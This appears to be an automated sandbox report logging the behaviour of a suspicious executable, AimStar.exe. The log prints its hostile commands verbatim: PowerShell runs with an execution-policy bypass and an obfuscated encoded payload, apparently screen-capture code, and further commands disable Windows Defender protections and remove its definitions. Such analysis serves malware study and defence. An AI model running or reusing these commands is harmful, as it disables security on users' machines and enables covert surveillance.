Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe

Code function: 88_2_00007FF71399B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

88_2_00007FF71399B340

Source: C:\Users\user\Desktop\AimStar.exe

Code function: 0_2_00007FF710F695E0 cpuid

0_2_00007FF710F695E0

Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\skoch.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\skoch.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\skoch.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\skoch.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\skoch.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\skoch.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
